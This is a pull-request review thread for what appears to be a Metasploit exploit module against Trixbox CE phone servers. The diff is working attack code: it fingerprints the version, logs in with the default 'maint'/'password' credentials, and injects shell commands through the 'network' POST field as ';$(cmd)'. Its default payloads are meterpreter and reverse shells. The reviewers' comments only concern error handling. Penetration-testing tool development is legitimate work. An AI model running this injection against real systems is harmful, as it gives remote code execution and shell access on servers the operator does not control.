modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,182 @@
+            [
+              'Automatic (Linux Dropper)',
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(res)
+    version = res.body.scan(/v(\d\.\d)/).flatten.first
+    print_good("#{peer} - Trixbox CE v#{version}.x identified.")
+    if Gem::Version.new(version).between?(Gem::Version.new('2.6'), Gem::Version.new('2.8'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0'), Gem::Version.new('2.4'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version) == Gem::Version.new('1.2')
+      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
+    else
+      return nil
+    end
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    uri = normalize_uri(target_uri.path, '/maint/')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass)
+    })
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed.')
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      return res
+    elsif res.code == 401
+      fail_with(Failure::NoAccess, 'Authentication failed.')
+    else
+      fails_with(Failure::UnexpectedReply, "The host responded with an unexpected status code: #{res.code}.")
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'authorization' => basic_auth(user, pass),
+      'vars_post' => {
+        'network' => ";$(#{cmd})"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      vprint_error 'Connection failed.'
+      return CheckCode::Detected
```

Comment:
Technically, with the way that `login` is currently encoded, you could fail for a variety of reasons, some of which are `CheckCode::Unknown` related, some of which are `CheckCode::Detected` related. And yet I'm fairly sure that all the `fail_with` cases in `login` will prevent the `login` function from ever returning unless it encounters a success condition.....

Basically right now I'm not sure the logic of `login` is correct, nor are the functions that call it. Let me get back to you on this one...

Reply:
+1 for granularity in failures.

Reply:
Okay so spoke to @wvu-r7 and I found out doing `fail_with` calls isn't what we want in most cases. The reason for this is that `fail_with` will cause the entire module to terminate. In most cases, such as the `logon` call, we want to print out an error message via `print_error`, return a specific error code to the caller, and then have the caller decide, based on this error code, what to do.

So we will need to rework `login` method and its callers to adjust for this.

Reply:
If this is in the `check` method, we definitely want to return a `CheckCode` in every case. `fail_with` _can_ be handled for checks, but it's ill-advised in the current implementation, and the intent is to bail out of the module. Print and error and return `CheckCode::Unknown` if all else fails, IMHO.

Reply:
`login` has been slightly updated.